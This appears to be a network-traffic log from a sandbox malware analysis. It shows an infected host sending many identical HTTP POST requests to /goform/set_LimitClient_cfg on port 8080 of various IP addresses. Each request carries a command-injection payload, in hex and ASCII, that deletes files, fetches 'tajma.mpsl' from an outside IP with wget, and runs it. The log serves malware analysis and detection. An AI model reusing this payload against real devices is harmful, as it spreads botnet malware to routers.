                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.2335988222.217.236.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443983078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1060192.168.2.2355444102.133.81.2398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444005966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.234478446.244.105.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444061041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.235991875.143.69.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444099903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.2335236204.102.41.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444133043 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.23382024.179.241.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444170952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.233738047.97.47.918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444192886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.233282867.76.116.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444216967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.234067642.108.205.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444367886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.2355274114.132.212.2418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444367886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.2347460155.190.254.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444394112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.235343495.212.195.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444441080 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1071192.168.2.2348078180.121.105.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444458008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1072192.168.2.234188820.199.81.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444523096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1073192.168.2.236020250.167.50.1598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444538116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1074192.168.2.233806690.99.137.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444557905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1075192.168.2.2357066100.167.240.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444586992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1076192.168.2.2347232135.98.128.1548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444611073 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1077192.168.2.2344884108.111.229.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444631100 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1078192.168.2.2341818148.189.176.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444657087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1079192.168.2.2338462188.131.189.558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444657087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1080192.168.2.235654618.116.213.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444678068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1081192.168.2.2340982111.15.141.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.444700003 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
